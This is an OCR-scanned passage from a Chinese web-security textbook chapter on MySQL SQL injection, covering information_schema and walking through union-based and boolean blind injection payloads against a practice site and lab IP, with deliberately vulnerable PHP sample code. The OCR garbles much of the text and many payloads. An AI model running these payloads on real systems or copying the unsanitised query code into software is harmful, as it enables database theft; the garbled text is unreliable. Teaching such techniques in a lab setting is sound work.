符 型 注 和 人 人。 具体 有 没有 字符 型 注入 ,是 否 可 以 通过 字符 型 注入 获取 有 效 信息 ,还 需要 大 量 
的 测试 来 验证 。 


2 4 MySQL 注入 


MySQL 数据 库 是 一 种 开放 源 代码 的 关系 型 数据 库 管理 系统 ,使 用 最 常用 的 数据 库 
管理 语言 一 一 SQL(Structured Query Language, 结 构 化 查询 语言 ) 进 行 数据 库 管 理 。 


2.4.1 information_schema 数据 库 


从 MySQL 5 开始 , MySQL 自 带 information_schema 数据 库 , 它 提供 了 访问 数据 库 
元 数据 的 方式 。 元 数据 是 关于 数据 的 数据 ,如 数据 库 


Tformstion sd 


名 或 表 名 列 的 数据 类 型 或 访问 权限 等 。information_ espe 
4 collations 
schema 数据 库存 储 了 SCHEMATA X TABLES X fil d dee iron 


3| columns 


COLUMNS 表 , 如 图 2-1 所 示 。 

SCHEMATA 表 提 供 了 当前 MySQL 实例 中 所 有 
数据 库 的 信息 。show databases 命令 的 结果 取 自 此 表 。 
SCHEMATA 表 存 储 了 所 有 的 数据 库 名 ,如 图 2-2 
所 示 。 

TABLES 表 提 供 了 关于 数据 库 中 的 表 ( 包 括 视 图 ) 的 信息 ,包括 某 个 表 属 于 哪个 
schema、 表 类 型 . 表 引 擎 .创建 时 间 等 信息 。show tables from "schemaname"( 库 名 ) 命 令 
的 结果 取 自 此 表 。TABLES 表 存储 了 所 有 的 表 名 ,如 图 2-3 所 示 。 

COLUMNS 表 提 供 了 表 中 的 列 信息 ,包括 某 个 表 的 所 有 列 以 及 每 个 列 的 信息 。 
show columns from "schemaname. tablename"( 表 名 ) 命 令 的 结果 取 自 此 表 。COLUMNS 
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2-1 information schema 数据 库 


m 第 2 章 SQL 注入 漏洞 mw 


ysql» select * from information schema.SCHEMATA; 


m—— ———————— 4----- 
1 information schema | x Li ! 1 
1 def | mysql 1 | utf8 general ci | NULL 1 
| def | performance schema | utf8 | utf8 general ci | NULL 1 
| def | test | latini | latini swedish ci 1 NULL 1 
| def | wcms | utf8 | utf8 general ci | NULL I 
|— —— s mL a —— + 


[b rows in set 


图 2-2 SCHEMATA 表 存 储 所 有 的 数据 库 名 


mysql> select table schema,table name from information schema.rables where table schema-'security'; 
+ 


4-------------- 4------------ 
| table schema | table name | 
+-------------- +------------ + 
1 security | emails 1 
| security | referers | 
| security 1 uagents 1 
| security | users 1 
+-------------- +------------ * 


4 rows in set 


图 2-3 TABLES 表 存储 所 有 的 表 名 


表 存 储 了 所 有 表 中 所 有 的 列 名 ,如 图 2-4 Bros 。 


mysql» select table name,column name from information schema.columns where table schema-'security'; 

I 1 
| emails | email id 1 
| referers | id 1 
| referers | referer 1 
| referers | ip address | 
| uagents | id I 
| uagents | uagent 1 
| uagents | ip address | 
| uagents | username 1 
| users | id 1 
| users | username I 
1 users 1 password 1 
—T +------------- + 
12 rows in set 


图 2-4 COLUMNS 表 存 储 所 有 表 中 所 有 的 列 名 
MySQL 用 户 均 有 权 访 问 这 些 表 ,但 仅 限于 表 中 的 特定 行 ,在 这 些 行 中 含有 用 户 拥有 
访问 权限 的 对 象 。 
2.4.2 MySQL 系统 库 


MySQL 系统 库 是 MySQL 的 核心 数据 库 , 主 要 负责 存储 数据 库 的 用 户 ,权限 设置 、 关 
键 字 等 MySQL 数据 库 需 要 使 用 的 控制 和 管理 信息 ,如 图 2-5 所 示 。 


24.3 MySQL 联合 查询 注入 


MySQL 联合 查询 注入 利用 union( 联 合 查询 ) 可 以 同时 执行 多 条 SQL 语句 的 特点 ， 
在 参数 中 插入 恶意 的 SQL 注入 语句 ,同时 执行 两 条 SQL 语句 ,获取 额外 敏感 信息 或 者 执 
行 其 他 数据 库 操作 。 
41 


mum Web 安全 原理 分 析 与 实践 mene 


1 

-- -+ 
| localhost | root | *81FSE21E35407D884A6CD4A731AEBFB6AF209E1B | 
| 127.0.0.1 | root | *81F5E21E35407D884AGCD4A731AEBFB6AF2OSE1B | 
| root | *81FSE21E35407D884A6CD4A731AEBFBGAF209E1B | 
+ + 和 + 
3 rows in set| 


图 2-5 MySQL 系统 库存 储 数据 库 的 用 户 等 信息 


1. MySQL 联合 查询 注入 payload 
MySQL 联合 查询 注入 payload 如 下 : 
CD 判断 注入 点 。 例 如 : 


http://www.ctfs-wiki.com/index.php?id-1 and 1-1 


(2) 判断 列 数 。 例 如 : 


http://www.ctfs-wiki.com//index.php? id-1 order by 1 


Go 判断 报错 点 。 例 如 : 


http://www.ctfs-wiki.com/index.php?id-1 and 1=2 union select 1,2,3 


(4) 获取 当前 数据 库 名 。 例 如 : 


http://www.ctfs-wiki.com/index.php? id-1 and 1-2 union select 1,CONCAT WS 
(CHAR (32,58, 32) , user (), database () ,version()),3 


(5) 获取 数据 库 中 的 表 名 。 例 如 : 


http://www.ctfs- wiki.com//index.php? id-1 and 1-2 union select 1,group _ 
concat(table name),3 from information schema.tables where table schema- 
'ctfswiki" 


(6) 获取 表 中 的 列 名 。 例 如 : 


http://www.ctfs- wiki.com//index.php? id-1 and 1-2 union select 1,group _ 
concat(column name), 3 from information schema.columns where table schema- 
'ctfswiki' and table name-'user" 


(7) 获取 列 中 的 数据 。 例 如 : 


http://www.ctfs- wiki.com//index.php? id-1 and 1-2 union select 1, group_ 
concat (username, ' ',password),3 from user 


2. union 的 作用 和 语法 
union 用 于 合并 两 个 或 多 个 SELECT 语句 的 结果 集 ,并 消去 表 中 任何 重复 行 。 
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注意 : 联合 查询 中 合并 的 选择 查询 必须 具有 相同 的 输出 字段 数 , 采 用 相同 的 顺序 ,并 
包含 相同 或 兼容 的 数据 类 型 。 
union 语法 如 下 : 


SELECT column name FROM tablel union SELECT column name FROM table2 


下 面 是 联合 查询 示例 。 通 过 联合 查询 ,将 select host,user from user 与 select 1,2 前 
后 两 个 结果 集 的 数据 合并 到 一 个 结果 集中 。 联 合 查询 结果 如 图 2-6 所 示 。 


E select host,user from user union select 1,2; 


—— =s Sas === 
| host | user í 
--— +-—-- -+ 
1. 


8 
° 
D 


l 
| 127.0.0.1 | root l 
1 localhost | ctfswiki | 
1 localhost | root 1 
11 1 2 1 
E---------- — + 
5 rows in set (0.00 sec) 


图 2-6 联合 查询 结果 


3. ORDER BY 的 作用 和 语法 

ORDER BY 子 句 按 一 个 或 多 个 字段 排序 查询 结果 ,可 以 是 升序 也 可 以 是 降序 ,默认 
是 升序 。ORDER 子 句 通常 放 在 SQL 语句 的 最 后 。 

特性 : 在 ORDER BY 子 句 中 ,可 以 用 字段 在 选择 列表 中 的 位 置 号 代替 字段 名 。 

因为 username 是 第 二 列 ,可 以 用 2 代替 ,所 以 select * from cms users order by 2 
就 是 select x from cms users order by username, 这 两 个 SQL 语句 的 查询 结果 相同 ,如 
图 2-7 所 示 。 


mysql» select * from cms users order by 2; 


4-------- 4---------- +---------------------------------- 十 
| userid | username | password l 
4-------- 4---------- +---------------------------------- * 
I 211 | ei0adc3949ba59abbe56e057f20f883e | 
I 112 | el0adc3949ba59abbe56e057f20f883e | 
4-------- 4---------- +---------------------------------- * 


4-------- 4---------- +---------------------------------- + 
| userid | username | password l 
— 4---------- +---------------------------------- * 
I 2]|1 | ei0adc3949ba59abbe56e057f20f883e | 
1 112 | ei0adc3949ba59abbe56e057f20f883e | 
4-------- 4---------- +---------------------------------- * 


图 2-7 用 2 和 替代 username 的 查询 结果 相同 
4. 联合 查询 注入 示例 分 析 
下 面 是 联合 查询 注 和 人 示例 代码 : 


$id-$ GET['id']; 
$sql-"SELECT * FROM users WHERE id-$id LIMIT 0,1"; 
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$result-mysql query($sql); 
$row-mysql fetch array ($result); 
if ($result) { 
echo "«td»".$row['id']."«/td»"; 
echo "«td»".$row['username']."«/td»"; 
echo "«td»".S$row['password']."«/td»"; 
) else{ 
echo ""; 
) 


从 上 述 代 码 中 可 以 看 出 , $ id 参数 没有 过 滤 , 直 接 拼接 到 SQL 语句 中 执行 ,存在 数字 
型 注入 ,应 用 程序 通过 echo 函数 将 查询 的 id username, password 结果 进行 输出 ,可 以 利 
用 联合 查询 的 方式 将 数据 从 数据 库 中 查 出 并 显示 到 前 端 页 面 中 。 


5. 联合 查询 注入 过 程 
1) 判断 注入 点 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/index.php?id-1 and 1-1 


页 面 正常 返回 id .name age 的 数据 信息 ,如 图 2-8 所 示 。 


Wi Load URL [hp//www crs-wid com/indexphp7id=1 and 1=1 


senum. 


D xecute 


[ Enable Post data [7] Enable Referrer 
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图 2-8 页 面 正常 返回 数据 信息 


在 数据 库 中 执行 的 SQL 语句 为 SELECT x FROM users WHERE id—1 and 1—1 
LIMIT 0,1, and 1 二 2, 人 逻辑 与 的 结果 为 真 ,所 以 返回 正常 页 面 。 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/index.php?id-1 and 1-2 
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页 面 不 正常 返回 ,如 图 2-9 所 示 。 


Wi Load URL httpy/www ctfs-wiki.com//indexphp7id=1 and 1=2 
IM 3 
D Execute 

D Enable Post data [L] Enable Referrer 
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index php?d-1 


id name age 
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图 2-9 页 面 不 正常 返回 的 效果 


在 数据 库 中 执行 的 SQL 语句 为 SELECT x FROM users WHERE id—1 and 1—2 LIMIT 
0,1,and 1 二 2, 逻 辑 与 的 结果 为 假 ,所 以 不 能 正常 返回 结果 ,id、name、age 无 数据 返回 。 

经 上 面 的 测试 ,可 以 判断 测试 语句 and 1—1 和 and 1—2 被 带 入 了 数据 库 并 被 执行 ， 
所 以 此 处 可 能 存在 一 个 注入 点 。 

2) 判断 列 数 

要 使 用 联合 查询 注入 获取 数据 库 的 敏感 数据 ,前 提 是 两 个 结果 集 的 列 数 相同 ,所 以 要 
首先 判断 index. php?id— 1 这 个 语句 在 数据 库 中 返回 几 列 ,也 就 是 SELECT * FROM 
users WHERE id— 1 and 1—2 LIMIT 0,1 这 个 语句 的 数据 结果 集 有 几 列 ,然后 才 可 以 用 
union 进行 联合 查询 。 因 为 可 以 用 字段 在 选择 列表 中 的 位 置 号 代替 字段 名 ,可 以 用 order 
by x 判断 结果 集 有 几 列 ,z 可 以 在 1 一 50 的 范围 内 尝试 ,也 可 以 是 更 大 的 范围 ,用 二 分 法 
可 以 很 快 地 进行 判断 。 

输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/index.php?id-1 order by 1 


页 面 正常 返回 ,如 图 2-10 所 示 。 这 说 明 返 回 结 果 集 至 少 有 1 列 ,服务 器 端 执 行 的 SQL 语 
AJJ SELECT * FROM users WHERE id— 1 order by 1 LIMIT 0,1。 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/index.php?id-1 order by 4 


页 面 不 正常 返回 ,如 图 2-11 所 示 。 这 说 明 返 回 结果 集 小 于 4 列 , 服 务 器 端 执行 的 SQL 语 
句 为 SELECT * FROM users WHERE id— 1 order by 4 LIMIT 0,1。 
输入 以 下 测试 语句 : 
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图 2-10 order by 1 时 页 面 正常 返回 
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图 2-11 order by 4 时 页 面 不 正常 返回 


http://www.ctfs-wiki.com/index.php?id-1 order by 3 


页 面 正常 返回 ,如 图 2-12 所 示 。 这 说 明 返 回 结果 集 至 少 有 3 列 ,服务 器 端 执行 的 SQL 语 
句 为 SELECT * FROM users WHERE id=1 order by 3 LIMIT 0.1, 

经 过 上 面 的 测试 发 现 返回 的 结果 集 至 少 有 3 列 , 但 是 小 于 4 列 , 所 以 结果 集 为 3 列 。 
由 此 确定 联合 查询 结果 集 的 列 数 为 3 列 。 


3) 判断 报错 点 
通过 order by 的 判断 知道 了 返回 的 结果 集 是 3 列 , 但 是 并 不 知道 哪 一 列 会 在 前 端 显 


示 数 据 , 所 以 需要 判断 哪 一 列 是 报错 点 。 
注意 : 在 查询 中 经 常会 添加 and 1 一 2, 和 否则 ,经 过 联合 查询 后 ,会 返回 多 行 数据 。 很 
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图 2-12 order by 3 时 页 面 正 常 返回 


多 应 用 程序 只 返回 查询 到 的 第 一 条 结果 ,显示 的 还 是 原来 程序 正常 的 数据 ,而 联合 查询 结 
果 集 中 的 其 他 数据 就 不 会 显示 出 来 ,这 样 就 无 法 判断 是 哪 一 列 在 前 端 显示 数据 。 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/index.php?id-1 and 1-2 union select 1,2,3 


返回 2 和 3, 如 图 2-13 所 示 。 这 说 明 第 二 列 和 第 三 列 是 报错 点 ,因此 可 以 把 执行 查询 的 
SQL 语句 放 到 第 二 列 和 第 三 列 的 位 置 。 

4) 获取 当前 用 户 名 、 当 前 数据 库 名 .当前 版 本 等 信息 

可 以 用 以 下 函数 获取 相应 的 信息 : 

user; 获取 当前 用 户 名 。 

database: 获取 当前 数据 库 名 。 

version: 获取 当前 版 本 。 

concat 函数 用 于 连接 字符 串 。 使 用 concat('11',"22',"330) 连 接 后 的 字符 串 为 112233， 
如 图 2-14 所 示 o 

输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/index.php? id-1 and 1-2 union select 1,CONCAT WS 
(CHAR (32, 58, 32) , user (),database(),version()),3 


获取 当前 用 户 名 为 ctfswiki@ localhost, 当 前 数据 库 名 为 ctfswiki, 当前 的 版 本 为 5. 1. 73. 
如 图 2-15 所 示 。 服 务 器 端 执 行 的 SQL 语句 为 SELECT * FROM users WHERE id—1 
and 1 = 2 union select 1, CONCAT WS(CHAR(32,58,32), user(), database C) , 


version )) .3, 
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id name age 
1 2 3 
© CTFS-WIKI 
图 2-13 返回 2 和 3 
mysql» select concat('11','22','33'); 
-+ 
concat('11','22','33') 
row in set 
图 2-14 concat 连接 字符 串 的 效果 
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图 2-15 返回 ctfswiki 数据库 信息 
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5) 获取 数据 库 中 的 表 名 
输入 以 下 测试 语句 : 


http://www.ctfs- wiki.com//index.php? id=1 and 1-2 union select 1, group_ 


concat(table name),3 from information schema.tables where table schema- 
'"ctfswiki' 


从 information schema. tables 表 中 取出 数据 库 名 为 ctfswiki 的 所 有 表 名 ,获得 user X. 
如 图 2-16 所 示 。 服 务 器 端 执行 的 SQL 语句 为 SELECT * FROM users WHERE id—1 
and 1=2 union select 1,group_concat(table_name),3 from information schema. tables 
where table schema —'ctfswiki', 
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2-16 返回 user 表 信息 


6) 获取 表 中 的 列 名 
输入 以 下 测试 语句 : 


http://www.ctfs- wiki.com//index.php? id-1 and 1-2 union select 1, group_ 
concat(column name), 3 from information schema.columns where table schema- 
'ctfswiki' and table name-'user' 


从 information schema. columns 表 中 取出 数据 库 名 为 ctfswiki、 表 名 为 user 的 所 有 列 名 ， 
获得 password, username, id 这 3 个 列 , 如 图 2-17 所 示 。 服 务 器 端 执行 的 SQL 语句 为 
SELECT x FROM users WHERE id 一 1 and 1—2 union select 1 ,group_concat(column 


_name) ,3 from information schema. columns where table schema- 'ctfswiki' and table - 
name- 'user', 


7) 获取 列 中 的 数据 
输入 以 下 测试 语句 : 
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图 2-17 返回 password , username, id 列 信息 


http://www.ctfs- wiki.com//index.php? id-1 and 1-2 union select 1,group 
concat (username, ' ', password),3 from user 


从 user 表 中 取出 username 和 password 列 中 的 数据 ,得 到 userl .passl 等 用 户 名 , 203 fi 
息 , 如 图 2-18 所 示 。 服 务 器 端 执行 的 SQL 语句 为 SELECT * FROM users WHERE id—1 


and 1—2 union select 1,group concat(username;' ', password) ,3 from user, 
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图 2-18 返回 userl,.passl 


2.4.4 MySQL bool 注入 


MySQL bool 注入 是 盲 注 的 一 种 。 与 报错 注入 不 同 ,bool 注入 没有 任何 报错 信息 输 


出 ,页 面 返回 只 有 正常 和 不 正常 两 种 状态 ,攻击 者 只 能 通过 返回 的 这 两 个 状态 来 判断 输入 
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的 SQL 注入 测试 语句 是 否 正 确 , 从 而 判断 数据 库 中 存储 了 哪些 信息 。 


1. bool 注入 payload 
bool 注入 payload 如 下 : 
COD 获取 数据 库 长 度 。 例 如 : 


http://www.ctfs-wiki.com/index.php? id-33 and (select length (database ()))>8 


测试 当前 数据 库 的 长 度 是 否 大 于 8 ,不 断 执行 测试 ,直至 成 功 判断 数据 库 的 长 度 为 止 。 
(2) 获取 当前 数据 库 名 。 例 如 : 


http://www.ctfs - wiki. com/index. php? id= 33 and (select ascii (substring 
(database(),1,1)))»98 


测试 当前 数据 库 名 的 第 一 个 字符 的 ASCII 码 是 否 大 于 98 ,不断 执行 测试 ,直至 成 功 判 断 
第 一 个 字符 的 ASCII 码 为 止 。 


http://www.ctfs - wiki. com/index. php? id= 33 and (select ascii (substring 
(database (),2,1)))>108 


测试 当前 数据 库 名 的 第 二 个 字符 的 ASCII 码 是 否 大 于 108, 不 断 执行 测试 ,直至 成 功 判 断 
第 二 个 字符 的 ASCII 码 为 止 。 


http://www.ctfs - wiki. com/index. php? id- 33 and (select ascii (substring 
(database (),3,1)))>115 


测试 当前 数据 库 名 的 第 三 个 字符 的 ASCII 码 是 否 大 于 115, 不 断 执行 测试 ,直至 成 功 判 断 
第 三 个 字符 的 ASCI 码 为 止 。 
(3) 获取 当前 数据 库 的 表 名 。 例 如 


http://www. ctfs - wiki. com/index. php? id= 33 and ascii (substring ((select 
table name from information schema.tables where table schema-'cms' limit 0, 
1),1,1))«100 


测试 当前 cms 数据 库 的 第 一 个 表 的 表 名 中 第 一 个 字符 的 ASCII 码 是 否 小 于 100, 不 断 执 
行 测试 ,直至 成 功 判断 第 一 个 字符 的 ASCII 码 为 止 。 
http://www. ctfs - wiki. com/index. php? id= 33 and ascii (substring ((select 


table name from information schema.tables where table schema-'cms' limit 0, 
1),2,1))«109 


测试 当前 cms 数据 库 的 第 一 个 表 的 第 二 个 字符 的 ASCI 码 是 否 小 于 109 ,不 断 执行 测试 ， 
直至 成 功 判 断 第 二 个 字符 的 ASCII 码 为 止 。 


51 


mum Web 安全 原理 分 析 与 实践 meme 


(4) 获取 当前 数据 库 的 列 。 例 如 : 


http://www.ctfs - wiki. com/index. php? id= 33 and ascii (substring ((select 
column name from information schema.columns where table name-'cms users" 
and table schema-'cms' limit 0,1),1,1))«118 


测试 当前 cms 数据 库 cms users 表 第 一 列 的 第 一 个 字符 的 ASCI 码 是 否 小 于 118, 不 断 
执行 测试 ,直至 成 功 判 断 第 一 个 字符 的 ASCII 码 为 止 。 


http://www. ctfs - wiki. com/index. php? id= 33 and ascii (substring ((select 
column name from information schema.columns where table name-'cms users" 
and table schema-'cms' limit 0,1),2,1))«115 


测试 当前 cms 数据 库 cms users 表 第 一 列 的 第 二 个 字符 的 ASCII 码 是 否 小 于 115 ,不断 
执行 测试 ,直至 成 功 判 断 第 二 个 字符 的 ASCII 码 为 止 。 


(5) 获取 当前 数据 库 的 值 。 例 如 


http://www. ctfs - wiki. com/index. php? id=35 and ascii (substring ((select 
username from cms.cms_users limit 0,1),1,1))>100 


测试 cms 数据 库 cms_users 表 username 列 的 第 一 个 字符 的 ASCI 码 是 否 大 于 100, 不 断 
执行 测试 ,直至 成 功 判 断 第 一 个 字符 的 ASCII 码 为 止 。 


2. 基础 函数 

在 bool 注入 中 使 用 的 基础 函数 有 两 个 : substring 函数 和 ascii 函数 。 
1) substring 函数 

substring 函数 的 格式 是 


substring (字段 名 ,a，N) 


该 函数 用 来 从 指定 的 字段 第 A 个 字符 起 向 后 截取 N 个 字 。 
例如 ,substringCadmin',1,2) 表 示 从 admin 字符 串 中 的 第 一 个 字符 起 向 后 截取 两 个 


字符 ,截取 的 结果 是 ad, 如 图 2-19 所 示 。 
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2) ascii 函数 
ascii 函数 返回 字符 的 ASCII fid, 
例如 ,ascii('a) 返 回 字母 a 的 ASCII 码 97, 如 图 2-20 所 示 。 


[mysql> SELECT substring('admin',1,2):; 
+ 


PR 
| substring('admin',1,2) | 


Imysgi» select ascii('a'); 


1 row in set 


2-19  substring('admin'. 1.2) f] £5. 2-20 asciiC'aD3R [H] 97 
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3. bool 注入 示例 代码 分 析 
bool 注入 示例 代码 如 下 : 


$id=$ GET['id']; 
$sql-"SELECT * FROM users WHERE id-$id LIMIT 0,1"; 
$result-mysql query($sql); 
$row-mysql fetch array($result); 
if ($result) { 

echo "ctfs-wiki"; 
) elset 

echo ""; 


) 


从 上 述 代 码 中 可 以 看 出 , $ id 参数 没有 过 滤 , 直 接 拼接 到 SQL 语句 中 执行 ,存在 数字 
型 注入。 输入 参数 id 进行 SQL 注入 ,SQL 语句 执行 后 , 若 $ result 返回 真 , 应 用 程序 并 
没有 输出 查询 的 结果 ,而 是 显示 ctfs-wiki 字符 串 ; 若 $ result 返回 假 ,显示 为 空 , 这 样 就 无 
法 通过 SQL 注入 将 数据 库 的 查询 结果 显示 到 前 端 页 面 中 ,因此 只 能 通过 前 端 页 面 显示 的 
是 ctfs-wiki 字符 串 还 是 为 空 来 判断 输入 的 SQL 注入 测试 语句 是 否 正确 ,以 此 进行 注入 。 

4. bool 注入 过 程 

1) 利用 bool 注入 获取 数据 库 信息 


如 果 用 之 前 的 报错 注入 payload, 发 现 无 法 爆 出 数据 库 的 信息 ,只 显示 正常 页 面 。 报 
错 注入 payload 无 法 对 bool 型 注入 点 进行 注入 ,如 图 2-21 所 示 。 


httpu/192.16891.142/sg]/03.php?ids 1 and 1=2 union select 1.CONCAT WSICHAR(32 58 32) user() database() version() 3 


[O Enable Post data [ Enable Referrer 
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图 2-21 报错 注入 payload 显示 正常 页 面 


利用 上 面 两 个 函数 构造 bool 注入 : and (select ascii(substring(database() ,1,1))) 798, 
首先 将 数据 库 名 的 第 一 个 字符 利用 substring 函数 取出 ,然后 利用 ascii 函数 将 取出 后 的 
第 一 个 字符 转换 为 ASCII 码 ,最 后 与 数字 进行 比较 ,这 样 就 可 以 通过 页 面 的 返回 信息 来 
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判断 数据 库 名 的 字符 ASCI 码 。 

ASCII 码 的 范围 是 0 一 127, 可 以 选择 数字 、 字 母 等 可 见 字 符 的 ASCII 码 进行 判断 。 
这 里 判断 是 否 大 于 98, 当然 也 可 以 判断 是 否 大 于 其 他 数字 ,发 现 页 面 可 以 正常 显示 ctfs- 
wiki 字符 串 ,说 明 大 于 98. 

输入 以 下 测试 语句 : 


http://192. 168. 91. 142/sqli/03. php? id= 1 and (select ascii (substring 
(database (),1,1)))>98 


页 面 正常 返回 ,如 图 2-22 所 示 。 


http/7192:168.91.142/sgli/03.php?idz 1 And (select ASCINSUBSTRING(database0.1, 1)))>98 


[C Enable Post data [] Enable Referrer 
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Æ 2-22 页 面 正常 返回 (1) 


然后 尝试 判断 数据 库 名 的 第 一 个 字符 的 ASCII 码 是 否 大 于 110, 输 入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/03.php? id-1 And (select ascii (substring (database (), 
1,1)))2110 


页 面 不 显示 ctfs-wiki 字 符 串 ,如 图 2-23 所 示 。 这 说 明 数 据 库 名 的 第 一 个 字符 的 ASCII 
码 不 大 于 110。 

经 过 多 次 判断 发 现 , 数 据 库 名 的 第 一 个 字符 的 ASCII 码 大 于 98 ,但 是 不 大 于 99, 如 
图 2-24 所 示 。 这 说 明 第 一 个 字符 的 ASCI 码 为 99 ,也 就 是 字母 c。 

同样 利用 此 方法 判断 数据 库 名 的 第 二 个 字符 ,输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/03.php? id-1 And (select ascii(substring(database(), 
2,3)))>315 


页 面 正常 返回 ,说 明 第 二 个 字符 的 ASCII 码 大 于 115, 如 图 2-25 所 示 。 
输入 以 下 测试 语句 : 
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httpy/192.168.91.142/s9li/03 php?id=] And (select ASCIKSUBSTRING(databaseQ,1.1])» 110 
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图 2-23 页 面 不 正常 返回 (1) 


上” 142/sali/03.pho?id-1 And (select ASCI(SUBSTRING(database(,1.1])»99 — 
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http://192.168.91.142/sq1i/03.php? id-1 And (select ascii (substring (database (), 
2/52) 9:1]16, 


页 面 不 正常 返回 ,说 明 第 二 个 字符 的 ASCII 码 不 大 于 116 ,如 图 2-26 所 示 。 


httpy/19216891.1421sqjy03phpzid=1 And (select ASCINSUBSTRING(databaseQ 2.1]]]» 116 


C] Enable Post data [-] Enable Referrer 


CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包 含 、 命 令 执 行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 珊 洞 环境 


Follow @ctfs-wiki 


MYSQL SQL 


index php?id-1 


€ CTFS-wiQ 


图 2-26 页 面 不 正常 返回 (3) 


综 上 所 述 ,数据 库 名 的 第 二 个 字符 的 ASCII 码 大 于 115, 但 是 不 大 于 116, 说 明 第 二 
个 字符 的 ASCII 码 为 116 ,也 就 是 字母 t。 

接 下 来 ,还 是 通过 and (select ascii(substring(database() ,z,1))) 二 zz 获取 数据 库 名 
中 其 他 字符 的 信息 ,最 终 得 到 数据 库 的 名 称 为 ctfswiki。 

2) 利用 bool 注入 获取 表 名 

获取 表 名 的 原理 与 获取 数据 库 名 是 一 样 ,通过 依次 判断 表 名 各 个 字符 的 ASCII 码 来 
得 到 表 名 。 

通过 以 下 测试 语句 获取 数据 库 中 表 名 的 信息 ,得 到 数据 库 中 一 个 表 的 名 称 为 user。 


and ascii (substr ((select table name from information schema. tableswhere 
table schema-''ctfswiki' limit 0,1),1,1))«x 


下 面 介绍 获取 表 名 的 第 一 个 字符 的 过 程 。 
输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/03.php?id-1 and ascii (substring ( (select table_ 
name from information schema.tables where table_schema= 'ctfswiki' limit 0, 
1),1,1))»2116 


发 现 页 面 显 示 ctfs-wiki 字符 串 , 如 图 2-27 所 示 。 这 说 明 第 一 个 字符 的 ASCII 码 大 
F He. 

输入 以 下 测试 语句 : 
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http/192.16891.142/:91/03 php7id=1 and asciisubstriiselect table name from information schema.tables where table schema= ctíowiki limit 0.1) 1.1))>116 


C] Enable Post data 口 Enable Referrer 


CTFS-WIKI ` 


此 网 站 中 集合 了 SQL 注入 、 文 件 包 含 、 命 令 执 行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctfs-wiki 


MYSQL SQL 


图 2-27 页 面 正 常 返回 (3) 


http://192.168.91.142/sq1i/03.php?id-1 and ascii (substring ((select table _ 


name from information schema.tables where table schema- 'ctfswiki' limit 0, 


1),1;,1))>117 


面 不 显示 ctfs-wiki 字符 串 , 如 图 2-28 所 示 。 这 说 明 第 一 个 字符 的 ASCII 码 不 大 


于 117。 综 上 所 述 ,第 一 个 字符 的 ASCI 码 大 于 116, 不 大 于 117, 说 明 第 一 个 字符 的 


ASC 


IL 833 je 117, 也 就 是 字母 u. 


http/192.168.S1.142/sqli/03 php?id=1 and ascii(substr((select table name from information_schema.tables where table schemaz'ctíswiki limit 0.1)1,1))>117 


C Enable Post data [] Enable Referrer 


uu —————— 
CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含、 命令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 


Follow @ctfs-wiki 


MYSQL SQL 


lindex php?id-1 


OCTFS-WIKI 


图 2-28 页 面 不 正常 返回 (4) 


3) 利用 bool 注入 获取 列 名 


获取 列 名 的 原理 和 前 面 是 一 样 的 ,通过 依次 判断 列 名 各 个 字符 的 ASCII 码 来 得 


列 名 。 


到 
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通过 以 下 测试 语句 获取 数据 库 中 列 名 的 信息 ,得 到 数据 库 中 一 个 列 的 名 称 为 


username, 


and ascii(substr((select column name from information schema.columns where 
table name-'user' and table schema-'ctfswiki' limit 0,1),1,1))«x 


下 面 介绍 获取 列 名 的 第 一 个 字符 的 过 程 。 
输入 以 下 测试 语句 : 


http://192.168.91.142/sqli/03.php?id=1 and ascii (substring((select column 
name from information schema.columns where table name- ' user ' and table _ 
Schema-'ctfswiki' limit 1,1),1,1))»116 


发 现 页 面 显示 ctfs-wiki 字符 串 , 如 图 2-29 所 示 。 这 说 明 第 一 个 字符 的 ASCII 83 X. 
F 116, 


Wtpu/192.16891.142/sql03,php id and ascisubstr(select column name from information. schema columns where table name= user and table schema criswi limit 
1044392116 


[ Enable Post data 7] Enable Referrer 
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Follow @ctfs-wlkl 
MYSQL SQL 


ctts-uki 


OCTFS-WIC 

图 2-29 页 面 正 常 返回 (4) 
输入 以 下 测试 语句 : 
http://192.168.91.142/sq1i/03.php? id-1 and ascii (substring((select column 


name from information schema.columns where table name- 'user' and table 
Schema-'ctfswiki' limit 1,1),1,1))»117 


发 现 页 面 不 显示 ctfs- wiki FE ,说 明 第 一 个 字符 的 ASCII 码 不 大 于 117。 综 上 所 述 ,第 
一 个 字符 的 ASCII 码 大 于 116 ,不 大 于 117 ,说 明 第 一 个 字符 的 ASCII 码 就 是 117 ,也 就 是 
字母 u。 


4) 利用 bool 注入 获取 数据 
获取 数据 的 原理 和 前 面 是 一 样 的 ,通过 依次 判断 数据 的 各 个 字符 的 ASCII 码 来 得 到 


数据 。 
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通过 以 下 测试 语句 获取 数据 库 中 user 表 username 列 中 的 第 一 个 数据 为 userl。 


第 2 章 SQL 注入 漏洞 
and ascii (substring ((select username from ctfswiki.user limit 0,1),2,1))»x 


下 面 介绍 获取 列 中 的 第 一 个 数据 的 过 程 。 
输入 以 下 测试 语句 : 


http://192.168. 91. 142/sqli/03. php? id= 1 and ascii (substring ((select 
username from ctfswiki.user limit 0,1),1,1))>116 


发 现 页 面 显示 ctfs-wiki 字符 串 , 如 图 2-30 所 示 。 这 说 明 第 一 个 字符 的 ASCII 码 大 
F 116. 


htpjf192.16891.142/sgl/03 phpAids 1 and osciisubsting([select usemame from ctiswiki user lenit 0) 11)» 116 


[7] Enable Post data [7] Enable Referrer 
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Follow @ctfs-wiki 

MYSQL SQL 
index php 


clls kl 


OCTFS-WIG 


图 2-30 页 面 正常 返回 (5) 
输入 以 下 测试 语句 : 


http://192.168. 91. 142/sq1i/03. php? id = 1 and ascii (substring ((select 
username from ctfswiki.user limit 0,1),1,1))»117 


